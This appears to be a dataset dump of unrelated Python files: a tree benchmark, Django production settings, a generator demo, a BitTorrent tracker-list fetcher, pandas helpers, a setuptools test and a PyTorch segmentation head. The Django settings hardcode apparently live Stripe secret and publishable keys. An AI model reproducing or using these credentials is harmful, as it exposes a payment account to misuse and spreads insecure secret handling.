self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
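# Build the tree from the multiplicative-congruential key sequence k = (k * 37813) % 37831, also inserting each counter value i that is not a multiple of c.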
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
| [
"[email protected]"
] | |
ed3556874e717bbaf477fea4cadc0f06772d039c | 5e324af46c554b88b97ee26886b05c88457ff0f5 | /core/settings/production.py | 0514fd109ac361f269a79a6f0a4dcb5a3202ba61 | [] | no_license | doubleclickdetroit/dindintonight | 1bda8851e49782d4dc16ca77d46e4b1f431c2b52 | 9769e1a96730b02511d25af8828b075dff5c35b5 | refs/heads/master | 2016-08-04T22:01:08.083566 | 2014-07-26T18:58:58 | 2014-07-26T18:58:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,383 | py | """Production settings and globals."""
from os import environ
from base import *
# Normally you should not import ANYTHING from Django directly
# into your settings, but ImproperlyConfigured is an exception.
from django.core.exceptions import ImproperlyConfigured
def get_env_setting(setting):
""" Get the environment setting or return exception """
try:
return environ[setting]
except KeyError:
error_msg = "Set the %s env variable" % setting
raise ImproperlyConfigured(error_msg)
########## HOST CONFIGURATION
# See: https://docs.djangoproject.com/en/1.5/releases/1.5/#allowed-hosts-required-in-production
ALLOWED_HOSTS = []
########## END HOST CONFIGURATION
########## EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = environ.get('EMAIL_HOST', 'smtp.gmail.com')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-password
EMAIL_HOST_PASSWORD = environ.get('EMAIL_HOST_PASSWORD', '')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-user
EMAIL_HOST_USER = environ.get('EMAIL_HOST_USER', '[email protected]')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = environ.get('EMAIL_PORT', 587)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = '[%s] ' % SITE_NAME
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-use-tls
EMAIL_USE_TLS = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL CONFIGURATION
########## DATABASE CONFIGURATION
DATABASES = {}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {}
########## END CACHE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = get_env_setting('SECRET_KEY')
########## END SECRET CONFIGURATION
########## STRIPE CREDIT CARD PROCESSING
STRIPE_SECRET_KEY = 'sk_live_oTd6djTNRxCeURqgLUYgGLl3'
STRIPE_PUBLISHABLE_KEY = 'pk_live_8zQjpc9a3HnrLCYVttDDKTMh'
########## END STRIPE CREDIT CARD PROCESSING
| [
"[email protected]"
] | |
f1d0e4bc2bf2a727d168359cf8886cbca2f8e324 | 25ebc03b92df764ff0a6c70c14c2848a49fe1b0b | /daily/20190406/example_tinyloop/06generator.py | d865c30ed0ec9c763671dcf57f05205d0cd393bb | [] | no_license | podhmo/individual-sandbox | 18db414fafd061568d0d5e993b8f8069867dfcfb | cafee43b4cf51a321f4e2c3f9949ac53eece4b15 | refs/heads/master | 2023-07-23T07:06:57.944539 | 2023-07-09T11:45:53 | 2023-07-09T11:45:53 | 61,940,197 | 6 | 0 | null | 2022-10-19T05:01:17 | 2016-06-25T11:27:04 | Python | UTF-8 | Python | false | false | 240 | py | def f():
x = yield 1
print("@", x)
y = yield 2
print("@", y)
return x, y
itr = f()
v = next(itr)
print("!", v)
v = itr.send([v])
print("!", v)
try:
print(itr.send([v]))
except StopIteration as e:
print(e.args)
| [
"[email protected]"
] | |
43b6ce6cceabe1e527d08133bda8568d38084a2c | 8156f7278a568531f808edfa3cb9cc64090eba17 | /dmhy/getTracker.py | e56307b6feebcbc45cfbffcc4109d0bd8007886d | [] | no_license | DeSireFire/My_Spyder_Pool | 8ef3cfad7911e9e66e0993fb3fa73d10d75e4a7d | ead5d90fd8d532c3f96fb02ac8a1aa15697d8196 | refs/heads/master | 2023-04-06T00:41:12.706009 | 2021-04-29T13:20:59 | 2021-04-29T13:20:59 | 109,140,291 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,351 | py | import requests
URLS = {
'trackers_best':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_best.txt',
'trackers_all':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all.txt',
'trackers_all_udp':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all_udp.txt',
'trackers_all_http':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all_http.txt',
'trackers_all_https':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all_https.txt',
'trackers_all_ws':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all_ws.txt',
'trackers_best_ip':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_best_ip.txt',
'trackers_all_ip':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all_ip.txt',
}
_header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
}
def getBest(URL,_header,_str = False):
'''
    Fetch tracker lists hosted on GitHub to speed up magnet-link downloads.
    :param URL: string, the URL to request
    :param _header: dict, HTTP headers to send with the request
    :param _str: bool, whether to join the results into a single string.
    :return: a string or a list, depending on _str
'''
_respone = requests.get(url=URL,headers=_header)
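    # Prefix each tracker with "&tr=" so the result can be appended directly to a magnet URI.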
if _str:
print(''.join(list(map(lambda x: '&tr='+x,_respone.text.split()))))
return ''.join(list(map(lambda x: '&tr='+x,_respone.text.split())))
else:
print(list(map(lambda x: '&tr='+x,_respone.text.split())))
return list(map(lambda x: '&tr='+x,_respone.text.split()))
if __name__ == '__main__':
for k in URLS:
getBest(URLS[k],_header,True)
getBest(URLS[k],_header)
# magnet:?xt=urn:btih:deade98152a7b4683204e02989b8c0aab5a05366&tr=udp://tracker.coppersurfer.tk:6969/announce&tr=udp://tracker.open-internet.nl:6969/announce&tr=udp://tracker.leechers-paradise.org:6969/announce&tr=udp://tracker.internetwarriors.net:1337/announce&tr=udp://tracker.opentrackr.org:1337/announce&tr=http://tracker.opentrackr.org:1337/announce&tr=udp://9.rarbg.to:2710/announce&tr=udp://9.rarbg.me:2710/announce&tr=udp://tracker.openbittorrent.com:80/announce&tr=udp://exodus.desync.com:6969/announce&tr=udp://tracker.torrent.eu.org:451/announce&tr=udp://tracker.tiny-vps.com:6969/announce&tr=udp://denis.stalker.upeer.me:6969/announce&tr=udp://tracker.cyberia.is:6969/announce&tr=udp://thetracker.org:80/announce&tr=udp://open.demonii.si:1337/announce&tr=udp://bt.xxx-tracker.com:2710/announce&tr=udp://explodie.org:6969/announce&tr=http://open.acgnxtracker.com:80/announce&tr=http://explodie.org:6969/announce&tr=udp://ipv4.tracker.harry.lu:80/announce&tr=udp://tracker.uw0.xyz:6969/announce&tr=http://tracker.bz:80/announce&tr=udp://tracker.moeking.me:6969/announce&tr=udp://tracker.iamhansen.xyz:2000/announce&tr=udp://tracker.filepit.to:6969/announce&tr=udp://tracker.filemail.com:6969/announce&tr=udp://torrentclub.tech:6969/announce&tr=udp://retracker.netbynet.ru:2710/announce&tr=http://vps02.net.orel.ru:80/announce&tr=http://tracker.tvunderground.org.ru:3218/announce&tr=http://torrentclub.tech:6969/announce&tr=http://t.nyaatracker.com:80/announce&tr=http://retracker.mgts.by:80/announce&tr=udp://tracker.supertracker.net:1337/announce&tr=udp://tracker.nyaa.uk:6969/announce&tr=https://tracker.fastdownload.xyz:443/announce&tr=https://t.quic.ws:443/announce&tr=http://torrent.nwps.ws:80/announce&tr=http://open.trackerlist.xyz:80/announce&tr=udp://zephir.monocul.us:6969/announce&tr=udp://tracker.trackton.ga:7070/announce&tr=udp://tracker-udp.gbitt.info:80/announce&tr=udp://retracker.sevstar.net:2710/announce&tr=udp://retracker.maxnet.ua:80/announce&tr=udp://retracker.baikal-telecom.net:2710/announce&tr=udp://retracker.akado-ural.ru:80/announce&tr=udp://pubt.in:2710/announce&tr=udp://home.penza.com.ru:6969/announce&tr=udp://carapax.net:6969/announce&tr=udp://bt.dy20188.com:80/announce&tr=https://tracker.vectahosting.eu:2053/announce&tr=https://tracker.parrotsec.org:443/announce&tr=https://tracker.gbitt.info:443/announce&tr=http://tracker.torrentyorg.pl:80/announce&tr=http://tracker.moxing.party:6969/announce&tr=http://tracker.gbitt.info:80/announce&tr=http://tracker.bt4g.com:2095/announce&tr=http://retracker.sevstar.net:2710/announce&tr=http://mail2.zelenaya.net:80/announce&tr=http://gwp2-v19.rinet.ru:80/announce&tr=http://carapax.net:6969/announce&tr=udp://tracker.msm8916.com:6969/announce&tr=udp://tracker.fixr.pro:6969/announce&tr=udp://packages.crunchbangplusplus.org:6969/announce&tr=udp://chihaya.toss.li:9696/announce&tr=https://1337.abcvg.info:443/announce&tr=http://t.acg.rip:6699/announce&tr=http://share.camoe.cn:8080/announce&tr=http://bt-tracker.gamexp.ru:2710/announce&tr=udp://tracker4.itzmx.com:2710/announce&tr=http://tracker4.itzmx.com:2710/announce&tr=http://tracker3.itzmx.com:6961/announce&tr=http://tracker2.itzmx.com:6961/announce&tr=http://tracker1.itzmx.com:8080/announce
# magnet:?xt=urn:btih:547D64DEC379E0A5511C56065C75D7FE9E860BCB&tr=udp://tracker.coppersurfer.tk:6969/announce&tr=udp://tracker.open-internet.nl:6969/announce&tr=udp://tracker.leechers-paradise.org:6969/announce&tr=udp://tracker.internetwarriors.net:1337/announce&tr=udp://tracker.opentrackr.org:1337/announce&tr=http://tracker.opentrackr.org:1337/announce&tr=udp://9.rarbg.to:2710/announce&tr=udp://9.rarbg.me:2710/announce&tr=udp://tracker.openbittorrent.com:80/announce&tr=udp://exodus.desync.com:6969/announce&tr=udp://tracker.torrent.eu.org:451/announce&tr=udp://tracker.tiny-vps.com:6969/announce&tr=udp://denis.stalker.upeer.me:6969/announce&tr=udp://tracker.cyberia.is:6969/announce&tr=udp://thetracker.org:80/announce&tr=udp://open.demonii.si:1337/announce&tr=udp://bt.xxx-tracker.com:2710/announce&tr=udp://explodie.org:6969/announce&tr=http://open.acgnxtracker.com:80/announce&tr=http://explodie.org:6969/announce&tr=udp://ipv4.tracker.harry.lu:80/announce&tr=udp://tracker.uw0.xyz:6969/announce&tr=http://tracker.bz:80/announce&tr=udp://tracker.moeking.me:6969/announce&tr=udp://tracker.iamhansen.xyz:2000/announce&tr=udp://tracker.filepit.to:6969/announce&tr=udp://tracker.filemail.com:6969/announce&tr=udp://torrentclub.tech:6969/announce&tr=udp://retracker.netbynet.ru:2710/announce&tr=http://vps02.net.orel.ru:80/announce&tr=http://tracker.tvunderground.org.ru:3218/announce&tr=http://torrentclub.tech:6969/announce&tr=http://t.nyaatracker.com:80/announce&tr=http://retracker.mgts.by:80/announce&tr=udp://tracker.supertracker.net:1337/announce&tr=udp://tracker.nyaa.uk:6969/announce&tr=https://tracker.fastdownload.xyz:443/announce&tr=https://t.quic.ws:443/announce&tr=http://torrent.nwps.ws:80/announce&tr=http://open.trackerlist.xyz:80/announce&tr=udp://zephir.monocul.us:6969/announce&tr=udp://tracker.trackton.ga:7070/announce&tr=udp://tracker-udp.gbitt.info:80/announce&tr=udp://retracker.sevstar.net:2710/announce&tr=udp://retracker.maxnet.ua:80/announce&tr=udp://retracker.baikal-telecom.net:2710/announce&tr=udp://retracker.akado-ural.ru:80/announce&tr=udp://pubt.in:2710/announce&tr=udp://home.penza.com.ru:6969/announce&tr=udp://carapax.net:6969/announce&tr=udp://bt.dy20188.com:80/announce&tr=https://tracker.vectahosting.eu:2053/announce&tr=https://tracker.parrotsec.org:443/announce&tr=https://tracker.gbitt.info:443/announce&tr=http://tracker.torrentyorg.pl:80/announce&tr=http://tracker.moxing.party:6969/announce&tr=http://tracker.gbitt.info:80/announce&tr=http://tracker.bt4g.com:2095/announce&tr=http://retracker.sevstar.net:2710/announce&tr=http://mail2.zelenaya.net:80/announce&tr=http://gwp2-v19.rinet.ru:80/announce&tr=http://carapax.net:6969/announce&tr=udp://tracker.msm8916.com:6969/announce&tr=udp://tracker.fixr.pro:6969/announce&tr=udp://packages.crunchbangplusplus.org:6969/announce&tr=udp://chihaya.toss.li:9696/announce&tr=https://1337.abcvg.info:443/announce&tr=http://t.acg.rip:6699/announce&tr=http://share.camoe.cn:8080/announce&tr=http://bt-tracker.gamexp.ru:2710/announce&tr=udp://tracker4.itzmx.com:2710/announce&tr=http://tracker4.itzmx.com:2710/announce&tr=http://tracker3.itzmx.com:6961/announce&tr=http://tracker2.itzmx.com:6961/announce&tr=http://tracker1.itzmx.com:8080/announce | [
"[email protected]"
] | |
f0c660265b92498d1ba0c1172e8fe861bbba7312 | 4649cce3d8da661ddb204428e21f714a502d36f9 | /src/ensae_teaching_cs/faq/faq_pandas.py | e7794b4e40526ab1f81f343648af19a2bd63b895 | [
"MIT"
] | permissive | xugonglei/ensae_teaching_cs | 10a7b97003e7d833dd0faaae939813bf1e134575 | f06d4ce7ea24338b5b217f6c46ff7980eac7e653 | refs/heads/master | 2020-04-30T11:10:47.368520 | 2015-10-29T21:41:23 | 2015-10-29T21:41:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,936 | py | # -*- coding: utf-8 -*-
"""
@file
@brief      Recurring problems with `pandas <http://pandas.pydata.org/>`_.
"""
def read_csv(filepath_or_buffer, encoding="utf8", sep="\t", **args):
"""
Calls function `read_csv <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_csv.html?highlight=read_csv#pandas.read_csv>`_
    with different default values. If the encoding is utf8 and the data is a file name, the function
    checks that there is no BOM at the beginning. Otherwise, it uses the encoding ``utf-8-sig``.
@param encoding encoding
@param filepath_or_buffer filepath_or_buffer
@param sep column separator
@return DataFrame
    @FAQ(pandas___Strange characters in utf8 files on Windows (BOM)?)
    .. index:: encoding, BOM, UTF8
    On Windows, some programs such as `Notepad <http://fr.wikipedia.org/wiki/Bloc-notes_%28Windows%29>`_
    can save a file under several different `encodings <http://en.wikipedia.org/wiki/Character_encoding>`_.
    With the `UTF8 <http://fr.wikipedia.org/wiki/UTF-8>`_ encoding, the first character
    ``\\ufeff`` sometimes causes a problem because Notepad adds what is called a `BOM <http://fr.wikipedia.org/wiki/Indicateur_d%27ordre_des_octets>`_.
    For example ::
        import pandas
        df = pandas.read_csv("dataframe.txt",sep="\\t", encoding="utf8")
        print(df)
    This triggers a most irritating error ::
        UnicodeEncodeError: 'charmap' codec can't encode character '\\ufeff' in position 0: character maps to <undefined>
    To work around it, simply change the encoding to `utf-8-sig <https://docs.python.org/3.4/library/codecs.html#encodings-and-unicode>`_ ::
import pandas
df = pandas.read_csv("dataframe.txt",sep="\\t", encoding="utf-8-sig")
print(df)
@endFAQ
"""
import pandas
if isinstance(filepath_or_buffer, str):
if encoding in ["utf8", "utf-8"]:
try:
df = pandas.read_csv(
filepath_or_buffer,
encoding=encoding,
sep=sep,
**args)
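                # A BOM surviving in the first column name means the file was really utf-8-sig;
                # raise so the except clause below retries with that encoding.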
if df.columns[0].startswith("\ufeff"):
raise UnicodeError(
"'charmap' codec can't encode characters in position 0-1325: character maps to <undefined>")
return df
except UnicodeError:
df = pandas.read_csv(
filepath_or_buffer,
encoding="utf-8-sig",
sep=sep,
**args)
return df
except UnicodeDecodeError:
df = pandas.read_csv(
filepath_or_buffer,
encoding="utf-8-sig",
sep=sep,
**args)
return df
else:
return pandas.read_csv(
filepath_or_buffer, encoding=encoding, sep=sep, **args)
else:
return pandas.read_csv(
filepath_or_buffer, encoding=encoding, sep=sep, **args)
def df_to_clipboard(df, **args):
"""
Copy a dataframe as csv text into the clipboard
@param df dataframe
    @param      sep     by default the separator is ``\\t`` for this function, unless specified otherwise
    It relies on the method
    `to_clipboard <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_clipboard.html>`_.
    @FAQ(pandas___Copy a dataframe to the clipboard)
    To get a dataframe into Excel, you can use the method
    `to_excel <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_excel.html>`_
    and then open the file in Excel, or copy the dataframe to the clipboard and paste it
    into an open Excel sheet. That is the purpose of the method
    `to_clipboard <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_clipboard.html>`_ ::
df = pandas.DataFrame ( ... )
df.to_clipboard(sep="\\t")
@endFAQ
"""
if "sep" in args:
df.to_clipboard(**args)
else:
df.to_clipboard(sep="\t", **args)
def df_equal(df1, df2):
"""
    compares two dataframes and tells whether they are equal
    @param      df1     first dataframe
    @param      df2     second dataframe
    @return             boolean
    The function compares the columns one by one.
    It does not require the order of the columns to be the same:
    it reorders the columns before doing the comparison.
    If you need a more complex comparison,
    you can look into the function `assert_frame_equal <https://github.com/pydata/pandas/blob/master/pandas/util/testing.py>`_.
    The function does not handle NaN values well because ``numpy.nan != numpy.nan`` is true.
    It also compares types:
    @FAQ(pandas___How to compare two dataframes?)
    Writing ``df1 == df2`` does not compare two dataframes with each other,
    because that comparison does not mean the same thing to everybody.
    Even if the values are the same, does the order
    of the columns matter?
    So it has to be done by hand. The code below
    first compares the dimensions, then the order
    of the columns, and finally the values ::
if df1.shape != df2.shape:
return False
l1 = list(df1.columns)
l2 = list(df2.columns)
l1.sort()
l2.sort()
if l1 != l2:
return False
df1 = df1[l1]
df2 = df2[l2]
t = (df1 == df2).all()
s = set(t)
return False not in s
@endFAQ
"""
if df1.shape != df2.shape:
return False
l1 = list(df1.columns)
l2 = list(df2.columns)
l1.sort()
l2.sort()
if l1 != l2:
return False
df1 = df1[l1]
df2 = df2[l2]
s = set((df1.dtypes == df2.dtypes))
if False in s:
return False
s = set((df1 == df2).all())
return False not in s
def groupby_topn(df, by_keys, sort_keys, ascending=True, n=1, as_index=True):
"""
takes the top n rows per group
@param df dataframe
@param by_keys rows will be grouped by these columns
@param sort_keys rows will be sorted by these columns
    @param      ascending       parameter passed to the sort function
    @param      n               n in top *n*
    @param      as_index        if False, remove the index after the group by
    @return     result
    @FAQ(pandas___top n rows per group with pandas)
    Grouping rows and then keeping only the first observations of each group is a
    classic problem. There is no single best way to do it;
    it depends on the number of observations per group. The simplest way
    to do it with pandas is:
    * group the rows
    * sort the rows within each group
    * keep the first rows of each group
    Which gives ::
        df.groupby(by_keys)
          .apply(lambda x: x.sort(sort_keys, ascending=ascending).head(n))
          .reset_index(drop=True)
    The last instruction removes the index, which gives the final dataframe
    the same structure as the initial one.
.. runpython::
:showcode:
import pandas
l = [ dict(k1="a", k2="b", v=4, i=1),
dict(k1="a", k2="b", v=5, i=1),
dict(k1="a", k2="b", v=4, i=2),
dict(k1="b", k2="b", v=1, i=2),
dict(k1="b", k2="b", v=1, i=3)]
df = pandas.DataFrame(l)
df.groupby(["k1", "k2"]).apply(lambda x: x.sort(["v", "i"], ascending=True).head(1))
print(df)
@endFAQ
"""
res = df.groupby(by_keys).apply(lambda x: x.sort(
sort_keys, ascending=ascending).head(n))
if not as_index:
res = res.reset_index(drop=True)
return res
| [
"[email protected]"
] | |
1a7add79983d9aaaa4ac9d383db387f438a20b30 | 3abe14e934f775aca6dba588a9da5c908808daec | /setuptools/tests/test_depends.py | e0cfa88049d7ab7e93b8af06cdac45ee96c0714d | [
"MIT"
] | permissive | IronLanguages/setuptools | e1d6d6aaf990a2691f79ce3a4ca21b87e2f10a1a | 20aa9400b3d44df952c362217d3c5a1c3988467f | refs/heads/master | 2020-03-19T04:21:15.955081 | 2018-06-02T13:26:55 | 2018-06-02T13:26:55 | 135,819,098 | 2 | 1 | MIT | 2018-06-02T13:17:01 | 2018-06-02T13:17:01 | null | UTF-8 | Python | false | false | 374 | py | import sys
from setuptools import depends
class TestGetModuleConstant:
def test_basic(self):
"""
Invoke get_module_constant on a module in
the test package.
"""
mod_name = 'setuptools.tests.mod_with_constant'
val = depends.get_module_constant(mod_name, 'value')
assert val == 'three, sir!'
assert 'setuptools.tests.mod_with_constant' not in sys.modules
| [
"[email protected]"
] | |
c03e87ec7816e07b685894a92fa3274d5414db6c | e80393d0e32358d68e60b5119406c654d2373e1f | /encoding/models/aca2.py | 83cbbae9f07d7dbe332b8679537ef97e0f8d8c86 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | yougoforward/Fast_psaa | 3e333fb31743bda7684cc0bdae378bf40d839f63 | 68e99cd5bcf3bf5ab45ea604c3898fabc458c020 | refs/heads/master | 2022-11-04T02:01:03.694010 | 2019-11-30T07:53:01 | 2019-11-30T07:53:01 | 224,800,023 | 1 | 1 | NOASSERTION | 2022-10-26T23:53:43 | 2019-11-29T07:27:43 | Python | UTF-8 | Python | false | false | 7,162 | py | from __future__ import division
import torch
import torch.nn as nn
import torch.nn.functional as F
from .mask_softmax import Mask_Softmax
from .fcn import FCNHead
from .base import BaseNet
__all__ = ['ACA2Net', 'get_aca2net']
class ACA2Net(BaseNet):
def __init__(self, nclass, backbone, aux=True, se_loss=False, norm_layer=nn.BatchNorm2d, **kwargs):
super(ACA2Net, self).__init__(nclass, backbone, aux, se_loss, norm_layer=norm_layer, **kwargs)
self.head = ACA2NetHead(2048, nclass, norm_layer, se_loss, jpu=kwargs['jpu'], up_kwargs=self._up_kwargs)
if aux:
self.auxlayer = FCNHead(1024, nclass, norm_layer)
def forward(self, x):
_, _, h, w = x.size()
_, _, c3, c4 = self.base_forward(x)
x = list(self.head(c4))
x[0] = F.interpolate(x[0], (h, w), **self._up_kwargs)
if self.aux:
auxout = self.auxlayer(c3)
auxout = F.interpolate(auxout, (h, w), **self._up_kwargs)
x.append(auxout)
return tuple(x)
class ACA2NetHead(nn.Module):
def __init__(self, in_channels, out_channels, norm_layer, se_loss, jpu=False, up_kwargs=None,
atrous_rates=(12, 24, 36)):
super(ACA2NetHead, self).__init__()
self.se_loss = se_loss
inter_channels = in_channels // 4
# self.conv5c = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
# norm_layer(inter_channels),
# nn.ReLU(inplace=True))
self.sec = guided_SE_CAM_Module(in_channels, inter_channels, norm_layer)
self.conv5e = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 1, padding=0, bias=False),
norm_layer(inter_channels), nn.ReLU(True))
# self.conv5c2 = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
# norm_layer(inter_channels),
# nn.ReLU(inplace=True))
self.sec2 = guided_SE_CAM_Module(in_channels, inter_channels, norm_layer)
self.conv5e2 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 1, padding=0, bias=False),
norm_layer(inter_channels), nn.ReLU(True))
self.conv8 = nn.Sequential(nn.Dropout2d(0.1), nn.Conv2d(512, out_channels, 1))
self.gap = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Conv2d(inter_channels, inter_channels, 1),
nn.Sigmoid())
if self.se_loss:
self.selayer = nn.Linear(inter_channels, out_channels)
def forward(self, x):
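        # Two parallel guided SE-CAM branches process the same backbone features; their outputs are summed before the classifier head.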
# sec
# feat = self.conv5c(x)
sec_feat = self.sec(x)
sec_feat = self.conv5e(sec_feat)
# feat2 = self.conv5c2(x)
sec_feat2 = self.sec2(x)
sec_feat2 = self.conv5e2(sec_feat2)
feat_sum = sec_feat + sec_feat2
if self.se_loss:
gap_feat = self.gap(feat_sum)
gamma = self.fc(gap_feat)
outputs = [self.conv8(F.relu_(feat_sum + feat_sum * gamma))]
outputs.append(self.selayer(torch.squeeze(gap_feat)))
else:
outputs = [self.conv8(feat_sum)]
return tuple(outputs)
